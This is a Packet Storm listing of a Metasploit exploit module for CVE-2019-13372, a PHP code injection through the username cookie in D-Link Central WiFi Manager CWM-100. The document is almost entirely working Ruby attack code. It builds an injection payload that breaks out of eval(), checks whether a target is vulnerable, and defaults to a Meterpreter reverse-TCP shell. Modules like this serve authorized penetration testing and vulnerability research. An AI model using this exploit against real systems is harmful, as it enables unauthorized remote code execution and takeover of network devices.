This Metasploit module exploits a PHP code injection vulnerability in D-Link Central WiFi Manager CWM(100) versions below v1.03R0100_BETA6. The vulnerability exists in the username cookie, which is passed to eval() without being sanitized. Dangerous functions are not disabled by default, which makes it possible to get code execution on the target.
ac0e25a36b1f650a673695023120501aef0392916303b8f4a0574daeb5e71a35##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
prepend Msf::Exploit::Remote::AutoCheck
include Msf::Exploit::Remote::HttpClient
def initialize(info = {})
super(
update_info(
info,
'Name' => 'D-Link Central WiFi Manager CWM(100) RCE',
'Description' => %q{
This module exploits a PHP code injection vulnerability in D-Link Central WiFi Manager CWM(100)
versions below `v1.03R0100_BETA6`. The vulnerability exists in the
username cookie, which is passed to `eval()` without being sanitized.
Dangerous functions are not disabled by default, which makes it possible
to get code execution on the target.
},
'License' => MSF_LICENSE,
'Author' =>
[
'M3@ZionLab from DBAppSecurity', # Original discovery
'Redouane NIBOUCHA <rniboucha[at]yahoo.fr>' # PoC, metasploit module
],
'References' =>
[
['CVE', '2019-13372'],
['URL', 'https://unh3x.github.io/2019/02/21/D-link-(CWM-100)-Multiple-Vulnerabilities/' ]
],
'Targets' => [ [ 'Automatic', {}] ],
'DefaultTarget' => 0,
'DefaultOptions' => {
'PAYLOAD' => 'php/meterpreter/reverse_tcp',
'SSL' => true,
'RPORT' => 443
},
'Platform' => %w[php],
'Arch' => [ ARCH_PHP ],
'DisclosureDate' => 'Jul 9 2019'
)
)
register_options(
[
OptString.new('TARGETURI', [true, 'The base path to to the web application', '/'])
]
)
end
def inject_php(cmd)
encode_char = ->(char) { '%' + char.ord.to_s(16).rjust(2, '0') }
payload = "',0,\"\",1,\"0\")%3b#{cmd.gsub(/[;\s]/, &encode_char)}%3b//\""
res = send_request_cgi(
'method' => 'GET',
'uri' => normalize_uri(target_uri, 'index.php', 'Index', 'index'),
'cookie' => "username=#{payload};password="
)
res ? res.body[/^(.*?)<!DOCTYPE html>/mi, 1] : nil
end
def check
rand_text = Rex::Text.rand_text_alphanumeric(rand(4..10))
if inject_php("echo \"#{rand_text}\"")&.chomp == rand_text
return Exploit::CheckCode::Vulnerable
end
Exploit::CheckCode::Unknown
end
def exploit
inject_php(payload.raw)
end
end
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed